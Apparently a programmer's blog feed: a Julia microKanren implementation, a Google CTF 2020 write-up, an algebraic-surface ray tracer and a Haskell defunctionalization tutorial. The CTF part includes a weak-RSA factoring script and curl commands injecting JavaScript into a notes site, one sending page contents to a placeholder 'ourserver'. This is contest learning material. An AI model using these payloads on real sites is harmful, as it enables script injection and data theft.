function unify(u,v,s) # basically transcribed from the microkanren paper
    u = walk(s,u)
    v = walk(s,v)
    if isa(u,Var) && isa(v,Var) && u === v # do nothing if same
        return s
    elseif isa(u,Var)
        return assoc(s,u,v)
    elseif isa(v,Var)
        return assoc(s,v,u)
    elseif isa(u, Expr) && isa(v,Expr)
        # Only function call expressions are implemented at the moment 
        @assert u.head === :call && v.head === :call 
        if u.args[1] === v.args[1] && length(u.args) == length(v.args) #heads match
            for (u,v) in zip( u.args[2:end] , v.args[2:end] )  # unify subpieces
                s = unify(u,v,s)
                if s === nothing
                    return nothing
                end
            end
            return s
        else # heads don't match or different arity
            return nothing 
        end
    else # catchall for Symbols, Integers, etc
        if u === v
            return s
        else
            return nothing
        end
    end
end

I decided to use the gensym facility of Julia to produce new variables. That way I don’t have to thread around a variable counter like microkanren does (Julia is already doing this somewhere under the hood). Makes things a touch simpler. I made a couple fresh combinators for convenience. Basically you pass them an anonymous function and you get fresh logic variables to use.


fresh(f) = f(Var(gensym()))
fresh2(f) = f(Var(gensym()), Var(gensym()))
fresh3(f) = f(Var(gensym()), Var(gensym()), Var(gensym()))
freshn(n, f) = f([Var(gensym()) for i in 1:n ]...) # fishy lookin, but works. Not so obvious the evaluation order here.

Kanren is based around composing goals with disjunction and conjunction. A goal is a function that accepts a current substitution dictionary s and outputs a stream of possible new substitution dictionaries. If the goal fails, it outputs an empty stream. If the goal succeeds only one way, it outputs a singleton stream. I decided to attempt to use iterators to encode my streams. I’m not sure I succeeded. I also decided to forego separating out mplus and unit to match the microkanren notation and inlined their definition here. The simplest implementation of conjunction and disjunction look like this.

# unification goal
eqwal(u,v) = s -> begin   
                     s = unify(u,v,s)
                     (s == nothing) ? () : (s,)
                  end

# concatenate them
disj(g1,g2) = s -> Iterators.flatten(  (g1(s)  , g2(s)) ) 
# bind = "flatmap". flatten ~ join
conj(g1,g2) = s -> Iterators.flatten( map( g2 ,  g1(s) ))

However, the next level throws thunks in the mix. I think I got it to work with a special thunk Iterator type. It mutates the iterator to unthunkify it upon first forcing. I have no idea what the performance characteristics of this are.

# Where do these get forced. Not obvious. Do they get forced when flattened? 
mutable struct Thunk #{I}
   it # Union{I,Function}
end

function pull(x) # Runs the trampoline
    while isa(x,Function)
        x = x()
    end
    x
end

function Base.length(x::Thunk) 
    x.it = pull(x.it)
    Base.length(x.it)
end

function Base.iterate(x::Thunk) 
    x.it = pull(x.it)
    Base.iterate(x.it)
end

function Base.iterate(x::Thunk, state) 
    x.it = pull(x.it) # Should we assume forced?
    Base.iterate(x.it, state)
end

# does this have to be a macro? Yes. For evaluation order. We want g 
# evaluating after Zzz is called, not before
macro Zzz(g) 
    return :(s -> Thunk(() -> $(esc(g))(s)))
end

Then the fancier conjunction and disjunction are defined like so. I think conjunction does not need to be changed since iterate takes care of the trampoline. (Edit: No this is fundamentally busted insofar as it was intended to be a miniKanren style complete search. It is instead doing something closer to depth first. I might as well not even do the swapping. I suspect one cannot use flatten as is if one wants minikanren style search. )

disj(g1,g2) = s -> begin
     s1 = g1(s)
     s2 = g2(s)
     if isa(s1,Thunk)  && isa(s1.it, Function) #s1.forced == false  
        Iterators.flatten(  (s2  , s1) )
     else
        Iterators.flatten(  (s1  , s2) )
     end
end

conj(g1,g2) = s -> Iterators.flatten( map( g2 ,  g1(s) )) # eta expansion

Nice operator forms of these expressions. It’s a bummer that operator precedence is not use definable. ≅ binds more weakly than ∧ and ∨, which is not what you want.


∧ = conj # \wedge
∨ = disj # \vee
≅ = eqwal #\cong

I skipped using the association list representation of substitutions (Although Assoc Lists are in Base). I’ve seen recommendations one just use persistent dictionaries and it’s just as easy to drop that it. I’m just using a stock persistent dictionary from FunctionalCollections.jl https://github.com/JuliaCollections/FunctionalCollections.jl .


using FunctionalCollections
function call_empty(n::Int64, c) # gets back the iterator
    collect(Iterators.take(c( @Persistent Dict() ), n))
end

function run(n, f)
    q = Var(gensym())
    res = call_empty(n, f(q))
    return map(s -> walk_star(q,s), res)    
end

# walk_star uses the substition to normalize an expression
function walk_star(v,s)
        v = walk(s,v)
        if isa(v,Var)
            return v
        elseif isa(v,Expr)
            @assert v.head == :call
            return Expr(v.head ,vcat( v.args[1], 
                        map(v -> walk_star(v,s), v.args[2:end]))...)
        else
            return v
        end
end

Here’s we define an append relation and an addition relation. They can be used in reverse and all sorts of funny ways!

function nat(n) # helper to build peano numbers
    s = :zero
    for i in 1:n
        s = :(succ($s))
    end
    return s
end

function pluso(x,y,z)
      (( x ≅ :zero ) ∧ (y ≅ z) ) ∨
      fresh2( (n,m) -> (x ≅ :(succ($n))) ∧ (z ≅ :(succ($m))) ∧ @Zzz(pluso( n, y, m)))
end

function appendo(x,y,z)
    (x ≅ :nil) ∧ (y ≅ z) ∨
    fresh3( (hd, xs ,zs) ->  (x ≅ :(cons($hd,$xs)) )  ∧ (z ≅ :(cons($hd, $zs)))  ∧ @Zzz( appendo( xs,y,zs )))
end

Here we actually run them and see results to queries.

# add 2 and 2. Only one answer
>>> run(5, z -> pluso(nat(2), nat(2), z))
1-element Array{Expr,1}:
 :(succ(succ(succ(succ(zero)))))

>>> run(5, z -> fresh2( (x,y) -> (z ≅ :( tup($x , $y))) ∧ pluso(x, :(succ(zero)), y)))
5-element Array{Expr,1}:
 :(tup(zero, succ(zero)))
 :(tup(succ(zero), succ(succ(zero))))
 :(tup(succ(succ(zero)), succ(succ(succ(zero)))))
 :(tup(succ(succ(succ(zero))), succ(succ(succ(succ(zero))))))
 :(tup(succ(succ(succ(succ(zero)))), succ(succ(succ(succ(succ(zero)))))))

>>> run(3, q ->  appendo(   :(cons(3,nil)), :(cons(4,nil)), q )  )
1-element Array{Expr,1}:
 :(cons(3, cons(4, nil)))

# subtractive append
>>> run(3, q ->  appendo(   q, :(cons(4,nil)), :(cons(3, cons(4, nil))) )  )
1-element Array{Expr,1}:
 :(cons(3, nil))

# generate partitions
>>> run(10, q -> fresh2( (x,y) ->  (q ≅ :(tup($x,$y))) ∧ appendo( x, y, :(cons(3,cons(4,nil)))  )))
3-element Array{Expr,1}:
 :(tup(nil, cons(3, cons(4, nil))))
 :(tup(cons(3, nil), cons(4, nil)))
 :(tup(cons(3, cons(4, nil)), nil))

Thoughts & Links

I really should implement the occurs check

Other things that might be interesting: Using Async somehow for the streams. Store the substitutions with mutation or do union find unification. Constraint logic programming. How hard would it be get get JuMP to tag along for the ride?

It would probably be nice to accept Expr for tuples and arrays in addition to function calls.

http://minikanren.org/ You may also want to check out the book The Reasoned Schemer.

http://io.livecode.ch/ online interactive minikanren examples

http://tca.github.io/veneer/examples/editor.html more minikanren examples.

Microkanren implementation tutorial https://www.youtube.com/watch?v=0FwIwewHC3o . Also checkout the Kanren online meetup recordings https://www.youtube.com/user/WilliamEByrd/playlists

Efficient representations for triangular substitutions – https://users.soe.ucsc.edu/~lkuper/papers/walk.pdf

https://github.com/ekmett/guanxi https://www.youtube.com/watch?v=D7rlJWc3474&ab_channel=MonadicWarsaw

Could it be fruitful to work natively with Catlab’s GATExpr? Synquid makes it seem like extra typing information can help the search sometimes.

LogicT http://okmij.org/ftp/Computation/LogicT.pdf

Seres Spivey http://www.jucs.org/jucs_6_4/functional_reading_of_logic

Hinze backtracking https://dl.acm.org/doi/abs/10.1145/357766.351258

Google CTF 2020 Write Up

I found a link to the Google CTF as it was ongoing. Me and Ben (Team Skydog! Arf! Arf!) have been meaning to do a CTF for years and a combination of covid and procrastinating packing for a move finally made it happen!

The “easy” problems were ass kickers. I guess they were easy in the sense that total n00bs like us could eventually get them. But good lord. It seems inhuman to me that there are people rocking these things, but there are.

We were able to finish 3 problems and got close to a 4th.

There are similar write ups here https://ctftime.org/event/1041/tasks/ . Doesn’t seem like I did anything that unusual.

Beginner Reversing

This one was a binary that needed a password inputted . I booted up Ghidra to take a look at the binary which helped a lot in seeing a decompiled version. I’ve never really used Ghidra before. This is what Ghidra showed

ulong main(void)

{
  int iVar1;
  uint uVar2;
  undefined auVar3 [16];
  undefined input [16];
  undefined4 local_28;
  undefined4 uStack36;
  undefined4 uStack32;
  undefined4 uStack28;
  
  printf("Flag: ");
  __isoc99_scanf(&DAT_0010200b,input);
  auVar3 = pshufb(input,SHUFFLE);
  auVar3 = CONCAT412(SUB164(auVar3 >> 0x60,0) + ADD32._12_4_,
                     CONCAT48(SUB164(auVar3 >> 0x40,0) + ADD32._8_4_,
                              CONCAT44(SUB164(auVar3 >> 0x20,0) + ADD32._4_4_,
                                       SUB164(auVar3,0) + ADD32._0_4_))) ^ XOR;
  local_28 = SUB164(auVar3,0);
  uStack36 = SUB164(auVar3 >> 0x20,0);
  uStack32 = SUB164(XOR >> 0x40,0);
  uStack28 = SUB164(XOR >> 0x60,0);
  iVar1 = strncmp(input,(char *)&local_28,0x10);
  if (iVar1 == 0) {
    uVar2 = strncmp((char *)&local_28,EXPECTED_PREFIX,4);
    if (uVar2 == 0) {
      puts("SUCCESS");
      goto LAB_00101112;
    }
  }
  uVar2 = 1;
  puts("FAILURE");
LAB_00101112:
  return (ulong)uVar2;
}
        001010a9 e8 b2 ff        CALL       __isoc99_scanf                                   undefined __isoc99_scanf()
                 ff ff
        001010ae 66 0f 6f        MOVDQA     XMM0,xmmword ptr [RSP]=>input
                 04 24
        001010b3 48 89 ee        MOV        RSI,RBP
        001010b6 4c 89 e7        MOV        RDI,R12
        001010b9 ba 10 00        MOV        EDX,0x10
                 00 00
        001010be 66 0f 38        PSHUFB     XMM0,xmmword ptr [SHUFFLE]                       = 
                 00 05 a9 
                 2f 00 00
        001010c7 66 0f fe        PADDD      XMM0,xmmword ptr [ADD32]                         = 
                 05 91 2f                                                                    = null
                 00 00
        001010cf 66 0f ef        PXOR       XMM0,xmmword ptr [XOR]                           = 
                 05 79 2f 
                 00 00
        001010d7 0f 29 44        MOVAPS     xmmword ptr [RSP + local_28],XMM0
                 24 10
        001010dc e8 4f ff        CALL       strncmp                                          int strncmp(char * __s1, char * 
                 ff ff
        001010e1 85 c0           TEST       EAX,EAX
        001010e3 75 1b           JNZ        LAB_00101100
        001010e5 48 8b 35        MOV        RSI=>DAT_00102020,qword ptr [EXPECTED_PREFIX]    = 00102020
                 94 2f 00 00                                                                 = 43h    C
        001010ec ba 04 00        MOV        EDX,0x4
                 00 00
        001010f1 48 89 ef        MOV        RDI,RBP
        001010f4 e8 37 ff        CALL       strncmp                                          int strncmp(char * __s1, char * 
                 ff ff

Actually having this in ghidra makes this easier to see than it is here because Ghidra tells you which line of C is which line of assembly. Basically, it appears (after looking up some assembly instructions) that we need to find a string that after shuffling by a fixed pattern (SHUFFLE), packed adding a constant (ADD32), and xoring with a constant (XOR) equals itself.

I suppose this must be solvable by hand? They are suspiciously reversible operations. But I ended up using Z3 because I already know it pretty well. Something that made me totally nuts was translating byte ordering between x86 and z3. The only way I was able to do it was to go into gdb and go through the program instruction and make sure xmm0 had the same values as z3.

gdb a.out
break main
run
tui enable
layout asm
ni a bunch of times
print $xmm0

Then I put in the appropriate list reversals or reversed the bytes of the binary constants. It wasn’t so bad once I realized I had to do that.

from z3 import *

x = BitVec('x', 128)

#print(Extract(,0,x))
chunks8 = [ Extract(i*8+7, 8*i,x )  for i in range(16)]

#print([print for chunk in chunks8])
print(chunks8)
shuffle =  [0x02 ,0x06 ,0x07 , 0x01,  0x05, 0x0b, 0x09, 0x0e, 0x03 , 0x0f ,0x04 ,0x08, 0x0a, 0x0c, 0x0d, 0x00]
#shuffle = [ 16 - i for i in shuffle ] #?? Endian?  # for z3 ,extract 0 is the least significant 
shufflex = [chunks8[shuf] for shuf in shuffle]

shufflex = Concat(list(reversed(shufflex)))
print(shufflex)

chunks32 = [ Extract(i*32+31, 32*i,shufflex )  for i in range(4)]  #[Concat( shufflex[4*i: 4*i+4]) ) for i in range(4)]
print(chunks32)
#add32 = [0xefbeadde, 0xaddee1fe, 0x37133713, 0x66746367]
add32 = [0xedeadbeef, 0xfee1dead, 0x13371337, 0x67637466]
added = [ chunk + addo for chunk,addo in zip(chunks32,add32) ]

print(added)

xnew = Concat(list(reversed(added))) ^  0xAAF986EB34F823D4385F1A8D49B45876 # 0x7658b4498d1a5f38d423f834eb86f9aa
print(xnew)

s = Solver()
s.add(xnew == x)
#s.add(x !=  649710491438454045931875052661658691 )

#s.add(Extract( 4*8-1 , 0, xnew) == 0x102020 ) # 0x202010 
print(s.check())

m = s.model()
print(m)
print(m.eval(xnew))
#bit32chunks = [ Extract(high, low, x)  for i in range(4)]

#lower = Extract(31, 0, x) 
#lower = Extract(31, 0, x)  


#x = BitVec('addx', 128)
#[ Extract(high, low, x)  for i in range(0,16)]

I still don’t understand what is going on with the EXPECTED_PREFIX part. Somehow that memory gets filled with “CTF”, even though it doesn’t have that in the binary file. So maybe that is a red herring?

I wonder if KLEE would’ve just found it or if there was some other automated tool that would’ve worked? I see that one write up used angr

Beginner Hardware

This one had a verilog file and a verilator C++ file. Basically, a string is clocked into a circuit which does some minimal scrambling and then sets a flag once a good key has been sent in. An unexpectedly hard part was figuring out how to get verilator to work, which wasn’t strictly necessary. Another hard part was realizing that I was supposed to netcat the key into a server. Somehow I just totally ignored the url that was in the question prompt

Again, I used my formal method super powers just because. I downloaded EBMC, although yosys smtbmc would probably also work

 ~/Downloads/ebmc check.sv --trace --bound 100

I edited the file slightly. I turned always_ff into always since ebmc didn’t seem to support it. I also initialized the memory to zero so that I could get an actual trace and asserted that open_safe == 0 so that it would give me a countermodel that opens the safe. ebmc returned a trace, which I sent over netcat to the server and got the real key. One could back out the key by hand here, since it is fairly simple scrambling.

module check(
    input clk,

    input [6:0] data,
    output wire open_safe
);

reg [6:0] memory [7:0];
reg [2:0] idx = 0;
//initial begin
//   memory[0] = 	7'b1000011;
//  memory[5] =   7'b1010100;
//   memory[2] =   7'b1010100;
//    memory[7] =    7'b1111011 ; // 7'x7b;
//end

integer i;
initial begin
  for (i=0;i<8;i=i+1)
    memory[i] = 0;
end

wire [55:0] magic = {
    {memory[0], memory[5]},
    {memory[6], memory[2]},
    {memory[4], memory[3]},
    {memory[7], memory[1]}
};

wire [55:0] kittens = { magic[9:0],  magic[41:22], magic[21:10], magic[55:42] };
assign open_safe = kittens == 56'd3008192072309708;

always @(posedge clk) begin
    memory[idx] <= data;
    idx <= idx + 5;
end

assert property (open_safe==0); //  || memory[0] == 7'b110111); //|| memory[0] != b00110111

endmodule

Chunk Norris – Crypto

This one kicked my ass. I know basically nothing about crypto. The prompt was that there is a file that generates primes for an RSA encrytion. They are using a fishy looking generator for the primes.

#!/usr/bin/python3 -u

import random
from Crypto.Util.number import *
import gmpy2

a = 0xe64a5f84e2762be5
chunk_size = 64

def gen_prime(bits):
  s = random.getrandbits(chunk_size)

  while True:
    s |= 0xc000000000000001
    p = 0
    for _ in range(bits // chunk_size):
      p = (p << chunk_size) + s
      s = a * s % 2**chunk_size
    if gmpy2.is_prime(p):
      return p

n = gen_prime(1024) * gen_prime(1024)
e = 65537
flag = open("flag.txt", "rb").read()
print('n =', hex(n))
print('e =', hex(e))
print('c =', hex(pow(bytes_to_long(flag), e, n)))

I went up a couple blind alleys. The first thing we tried was brute forcing. Maybe if the generator is incredibly weak, we can just generate 1,000,000 primes and we’ll get a match. No such luck.

Second I tried interpreting the whole problem into Z3 and Boolector. This did not work either. In hindsight, maybe it could have? Maybe I messed up somewhere in this code?

import random
from Crypto.Util.number import *
import gmpy2
from z3 import *

#x = BitVec('n', 1024)

prime_size = 1024
chunk_size = 64

s1 = ZeroExt(2*prime_size - chunk_size, BitVec('s1', chunk_size)) #prime_size)
s2 = ZeroExt(2*prime_size - chunk_size, BitVec('s2', chunk_size))


a = 0xe64a5f84e2762be5

def gen_prime(s, bits):
    s |= 0xc000000000000001
    p = 0
    for _ in range(bits // chunk_size):
      p = (p << chunk_size) + s
      s = a * s % 2**chunk_size
    return p

def gen_prime(s, bits):
    s |= 0xc000000000000001
    p = 0
    for _ in range(bits // chunk_size):
      p = (p << chunk_size) + s
      s = a * s % 2**chunk_size
    return p

p = gen_prime(s1,prime_size)
q = gen_prime(s2,prime_size)


#n = 0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19
#n = 0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b
#n = BitVecVal("0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b", 64)
n = BitVec("n",2048) #(declare-const n (_ BitVec 224)  ) 
#s = parse_smt2_string( " (assert (= n  #x900000000001165742e188538bc53a3e129279c049360928a59b2de9))" , decls={"n": n})

#n = BitVecVal(0x90000000000055e4350fbb6baa0349fbde32f2f237fa10573dd3d46b, 64)
#print(hex(int(str(n)))) 0xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad
#s = Solver()
bv_solver = Solver() 
'''Then(With('simplify', mul2concat=True),
                 'solve-eqs', 
                 'bit-blast',
                 'sat').solver() '''
s = bv_solver 
#nstr = "#xd3899acc7973d22e820d41b4ef33cd232a98366c40fb1d70df2650ca0a96560672496f93afa03e8252a4e63054971cfa8352c9a73504a5caf35f3f5146ffd5f5762480b8140e1230864d3d0edf012bb3dd39b8ce089a64a8935a039e50f8e2ec02d514c892439242257a9bc0f377e5cc1994803cc63697b8aa5ee662a3efa96fb3e6946432e6e86987dabf5d31c7aa650c373b6b00a2cf559e9cfb8f38dc7762d557c45674dde0b5867c8d029a79a89a5feed5b24754bddb10084327fdad0303a09fb3b9306b9439489474dfb5f505460f63a135e85d0e5f71986e1cbce27b3bf3897aa8354206c431850da65cac470f0c1180bbfd4615020bfd5fdaafa2afad"
nstr = "#xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19"

s.add(parse_smt2_string( f" (assert (= n  {nstr}))" , decls={"n": n}))
#s.add( s1 < 2**chunk_size)
#s.add( s2 < 2**chunk_size)
s.add(s1 <= s2)
s.add( p * q == n)
set_option(verbose=10)
print(s.to_smt2())
print(s.check())
m = s.model()
print(m)
print(m.eval(p))
print(m.eval(q))

We also tried using this tool and see if we got any hits. https://github.com/Ganapati/RsaCtfTool Didn’t work. An interesting resource in any case, and I ended up using to to actually do the decryption once I had the primes.

Reading the problem prompt I realized they were emphasizing the way the random number generator was constructed. It turns out that this generator has a name https://en.wikipedia.org/wiki/Lehmer_random_number_generator . This did not lead to any revelations, so is actually a counter productive observation.

Anyway, looking at it, each 64 bit chunk is kind of independent of each other in the primes. And when you multiply the built primes, the chunks still don’t interweave all the much, especially the most and least significant chunk of n. Eventually I realized that the first and last chunk of the key n are simply related to the product of the 2 random numbers s used to generate the primes. The least significant chunk of n = s1 * s2 * a^30 mod 2^64. And the most significant chunk of n is the most significant 64 bits of s1 * s2 ( minus an unknown but small number of carries). We can reverse the a^30 by using the modular inverse of a which I used a web form to calculate. Then we basically have the product of s1 and s2. s1 and s2 are not primes, and this is a much smaller problem, so factoring these numbers is not a challenge.

import random
from Crypto.Util.number import *
import gmpy2

for q in range(16): # search over possible carries
    #e = q * 2 ** 64
    #print(hex(e))
    backn = 0x0273d3d4255f6b19 # least sig bits of n
    frontn = 0xab802dca026b1825 - q # most sig bits of n minus some carry
   
    chunk_size = 64
    bits = 1024
    a = 0xe64a5f84e2762be5 #16594180801339730917
    ainv = 13928521563655641581 # modular inverse wrt 2^64 https://www.dcode.fr/modular-inverse
    n0 = gmpy2.mpz("0xab802dca026b18251449baece42ba2162bf1f8f5dda60da5f8baef3e5dd49d155c1701a21c2bd5dfee142fd3a240f429878c8d4402f5c4c7f4bc630c74a4d263db3674669a18c9a7f5018c2f32cb4732acf448c95de86fcd6f312287cebff378125f12458932722ca2f1a891f319ec672da65ea03d0e74e7b601a04435598e2994423362ec605ef5968456970cb367f6b6e55f9d713d82f89aca0b633e7643ddb0ec263dc29f0946cfc28ccbf8e65c2da1b67b18a3fbc8cee3305a25841dfa31990f9aab219c85a2149e51dff2ab7e0989a50d988ca9ccdce34892eb27686fa985f96061620e6902e42bdd00d2768b14a9eb39b3feee51e80273d3d4255f6b19")


    abackn = backn # mutiply a^inv ** (30? or 32?) * backn = s1 * s2 mod 2**64
    for _ in range(bits // chunk_size - 1):
        abackn = ainv * abackn % 2**chunk_size
        abackn = ainv * abackn % 2**chunk_size
    print("abackn  ", hex(abackn))

    def prime_factors(n): # all prime factors, from a stack exchange post
        i = 2
        factors = []
        while i * i <= n:
            #print(i)
            if n % i:
                i += 1
            else:
                n //= i
                factors.append(i)
        if n > 1:
            factors.append(n)
        return factors


  





    def gen_prime_s(s,bits):
        s |= 0xc000000000000001
        p = 0
        for _ in range(bits // chunk_size):
            p = (p << chunk_size) + s
            s = a * s % 2**chunk_size
        return p

    print(len(hex(abackn)))
    tot_ss = (frontn * (2 ** (chunk_size)))  + abackn # combine the front and back. Should = s1 * s2
    print("frontbk", hex(tot_ss))
    print(len(hex(tot_ss)))
    g = prime_factors( tot_ss)
    print(g)
    ng = len(g)
    

    for i in range(2**ng): # try all ways of splitting prime list. Could do something less stupid, but whatev
        s1 = 1
        s2 = 1
        for x in range(ng):
            if (i >> x) & 1:
                s1 *= g[x]
            else:
                s2 *= g[x]
   
      
        p = gen_prime_s(s1,1024)
        q = gen_prime_s(s2,1024)
        n =  p*q
      
        if n == n0:
            print("holy shit")
            print(f"p = {p}", )
            print(f"q = {q}", )

Pasteurize Web

Strangely enough the web was also pretty hard. This is partially because this is getting further from stuff I know about. We ended up not finishing this one but I think we got close. We’re given access to a notes web app. Looking at the source, it turns out the server source was also being served. Eventually we figured out that we could curl in notes in an unexpected format using url-encoding which was conspicuously enabled in body-parser. The sanitizer makes the assumption that it is receiving a string, not an object. When the sanitizer removes the quotes from the JSON.stringify, it actually can remove an opening brace {, and then the first label of the object closes the string. When the note text is spliced into the webpage it isn’t properly escaped. We were able to get code to run via sending in an object with labels that were javascript code

curl -d 'content[;a=4;alert();]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/

By running an ajax request we could recevie data from TJMike’s browser

curl -d 'content[;var xhttp = new XMLHttpRequest();xhttp.open(`POST`, `https://ourserver`, true);xhttp.send(document.documentElement.innerHTML);]=;7;&content[;a=5;]=;4;' -H "Content-Type: application/x-www-form-urlencoded" -X POST https://pasteurize.web.ctfcompetition.com/

We were at the time limit then. I’ve heard we needed to grab the document.cookies and that had the key in it?

All told pretty cool. A very well organized CTF with fun challenges. I dunno if CTFs are for me. I felt my blood pressure raising a lot.

Ray Tracing Algebraic Surfaces

Ray tracing is a natural way of producing computer images. One takes a geometrical ray that connects the pinhole of the camera to a pixel of the camera and find where it hits objects in the scene. You then color the pixel the color of the object it hit.

You can add a great deal of complexity to this by more sophisticated sampling and lighting, multiple bounces, strange surfaces, but that’s it in a nutshell.

A very popular tutorial on this is Ray Tracing in One Weekend https://raytracing.github.io/

There are a couple ways to do the geometrical collision detection part. One is to consider simple shapes like triangles and spheres and find closed form algorithms for the collision point. This is a fast and simple approach and the rough basis of the standard graphics pipeline. Another is to describe shapes via signed distance functions that tell you how far from the object you are and use ray-marching, which is a variant of newton’s method iteratively finding a position on a surface along the ray. ShaderToys very often use this technique.

If you describe your objects using algebraic (polynomial) equations, like x^2 + y^2 + z^2 - 1 describes a sphere, there is the possibility of using root finding algorithms, which are readily available. I thought this was kind of neat. Basically the ray hitting the concrete pixel (x_0, y_0) can be parameterized by a univariate polynomial (x,y,z) = (\lambda x_0, \lambda y_0, \lambda) , which can be plugged into the multivariate polynomial (\lambda x_0)^2 + (\lambda y_0)^2 + \lambda^2 - 1. This is a univariate polynomial which can be solved for all possible collision points via root finding. We filter for the collisions that are closest and in front of the camera. We can also use partial differentiation of the surface equations to find normal vectors at that point for the purposes of simple directional lighting.

As is, it really isn’t very fast but it’s short and it works.

Three key packages are

using Images
using LinearAlgebra
using TypedPolynomials
using Polynomials

function raytrace(x2,y2,p)
    z = Polynomials.Polynomial([0,1])
    
    # The ray parameterized by z through the origin and the point [x2,y2,1] 
    x3 = [z*x2, z*y2, z]

    # get all the roots after substitution into the surface equation 
    r = roots(p(x=>x3)) 
    

    # filter to use values of z that are real and in front of the camera
    hits = map(real, filter( x -> isreal(x) & (real(x) > 0.0)  , r)) 

    if length(hits) > 0
        l = minimum(hits) # closest hit only
        x3 = [z(l) for z in x3]
        # get normal vector of surface at that point
        dp = differentiate(p, x) 
        normal = normalize([ z(x=> x3)  for z in dp])
        # a little directional and ambient shading
        return max(0,0.5*dot(normal,normalize([0,1,-1]))) + 0.2 
    else 
        return 0 # Ray did not hit surface
    end
end

@polyvar x[1:3]

# a sphere of radius 1 with center at (0,0,3)
p = x[1]^2 + x[2]^2 + (x[3] - 3)^2 - 1 

box = -1:0.01:1
Gray.([ raytrace(x,y,p) for x=box, y=box ])

Sphere.

@polyvar x[1:3]
R = 2
r = 1

# another way of doing offset
x1 = x .+ [ 0, 0 , -5 ] 

# a torus at (0,0,5)
# equation from https://en.wikipedia.org/wiki/Torus
p = (x1[1]^2 + x1[2]^2 + x1[3]^2 + R^2 - r^2)^2 - 4R^2 * (x1[1]^2 + x1[2]^2) 

box = -1:0.005:1
img = Gray.([ raytrace(x,y,p) for x=box, y=box ])
save("torus.jpg",img)
Torus

Some thoughts on speeding up: Move polynomial manipulations out of the loop. Perhaps partial evaluate with respect to the polynomial? That’d be neat. And of course, parallelize

Defunctionalizing Arithmetic to an Abstract Machine

There is great value in meditating upon the simplest possible example of a thing you can come up with. In this case one can apply defunctionalization techniques that are often applied to lambda calculus to simpler arithmetic calculations.

Functional programming is cool and useful, but it isn’t clear how to implement the features they provide on hardware that is controlled by assembly code. Achieving this is a fairly large topic. One step on the way is the concept of an abstract machine.

Abstract machines make more explicit how to evaluate a program by defining a step relationship taking a state of the machine to another state. I think this may be closer to how hardware is built because hardware is physical system. Physical systems are often characterizable by their space of states and the transitions or time evolution of them. That’s Newtonian mechanics in a nutshell.

There is a methodology by which to connect the definitions of abstract machines to interpreters of lambda calculus.

  • Convert to continuation passing style to make the evaluation order explicit
  • Defunctionalize these continuations

However, the lambda calculus is a non trivial beast and really only a member of a spectrum of different programming language features. Here is an incomplete set of features that you can mix and match:

  • Arithmetic expressions
  • Boolean expressions
  • let bindings
  • Printing/Output
  • Reading/Input
  • Mutation, References
  • For/While loops
  • Named Global Procedures
  • Recursion
  • Lambda terms / Higher Order Functions
  • Call/CC
  • error throw try catch
  • Algebraic Data Types
  • Pattern matching

In my opinion, the simplest of any of these is arithmetic expressions and with only this you can already meaningfully explore this evaluator to abstract machine translation.

First we need a data type for arithmetic

data AExpr = Lit Int | Add AExpr AExpr deriving (Eq, Show)

Pretty basic. We could easily add multiplication and other operators and it doesn’t change much conceptually except make things larger. Then we can define a simple interpreter.

type Value = Int

eval :: AExpr -> Value
eval (Add x y) = (eval x) + (eval y)
eval (Lit i) = i

The first step of our transformation is to put everything in continuation passing style (cps). The way this is done is to add an extra parameter k to every function call. When we want to return a result from a function, we now call k with that instead. You can kind of think of it as a goofy return statement. eval' is equivalent to eval above.

evalk :: AExpr -> (Value -> Value) -> Value
evalk (Add x y) k = evalk x (\vx -> (evalk y $ \vy -> k (vx + vy)))
evalk (Lit i) k = k i

eval' :: AExpr -> Value
eval' e = evalk e id

Now we defunctionalize this continuation. We note that higher order continuation parameters take only a finite number of possible shapes if evalk is only accessed via the above code. k can either be id, (\vx -> (evalk y $ \vy -> k (vx + vy))) , or \vy -> k (vx + vy). We give each of these code shapes a constructor in a data type. The constructor needs to hold any values closed over (free variables in the expression). id needs to remember nothing, \vx -> (evalk y $ \vy -> k (vx + vy)) needs to remember y and k, and \vy -> k (vx + vy) needs to remember vx and k.

data AHole = IdDone | AddL AExpr AHole | AddR Value AHole 

What functions are is a thing that can be applied to it’s arguments. We can use AHole exactly as before by defining an apply function.

apply :: AHole -> Value -> Value 
apply IdDone      v = v
apply (AddL e k)  v = evald e (AddR v k)
apply (AddR v' k) v = apply k (v' + v) 

And using this we can convert evalk into a new form by replacing the continuations with their defunctionalized data type.

